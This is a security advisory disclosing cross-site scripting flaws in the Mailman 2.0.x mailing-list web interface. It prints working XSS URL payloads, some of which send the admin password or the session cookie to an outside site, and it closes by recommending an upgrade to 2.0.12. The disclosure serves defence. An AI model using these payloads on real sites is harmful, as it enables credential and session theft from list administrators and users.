COMMAND

	Mailman cross-site scripting bug

SYSTEMS AFFECTED

	Mailman 2.0.11 and under it

PROBLEM

	office  [office@ukky.net]   [office@office.ac]   [http://www.office.ac/]
	says :
	

	Mailman is software to help manage  electronic  mail  discussion  lists,
	much like  Majordomo  or  Smartmail.  And  Mailman  have  web  interface
	system.
	

	 Example

	 =======

	

	You can recognize the vulnerability with this type of URL;
	

	http://mailman_site/mailman_dirctory/admin/ml-name?"><script>alert("hello")</script>

	

	and that prove that any (malicious)  script  code  is  possible  on  web
	interface part of Mailman.
	

	For example, if you access to this URL  with  Internet  Explorer  (other
	browser is not affected by the URL), the page figure is similar to  real
	one, but the password of admin you enter and submit are send to  another
	malicious site (http://www.office.ac/). This URL are valid  for  version
	2.0.10.
	

	http://mailman_site/mailman_dirctory/admin/ml-name?adminpw="></form><form/action="http://www.office.ac/webform.cgi"/method="post"><br

	

	And Mailman 2.0.11 still have vulnerabilities, if you  access  to  these
	URL with Internet Explorer (other  browser  is  not  affected  by  these
	URL), your information in cookie about the mailman_site  could  be  send
	another malicious site (http://www.office.ac/).
	

	http://mailman_site/mailman_dirctory/admin/ml-name?adminpw="/onClick="window.open('http://www.office.ac/j.cgi?'+document.cookie);

	http://mailman_site/mailman/subscribe/ml-name?info=<script>document.location%3D"http://www.office.ac/j.cgi?"%2Bdocument.cookie;</script>

	

	

SOLUTION

	Users should upgrade to Mailman 2.0.12 or later
	

	http://mail.python.org/pipermail/mailman-announce/2002-July/000043.html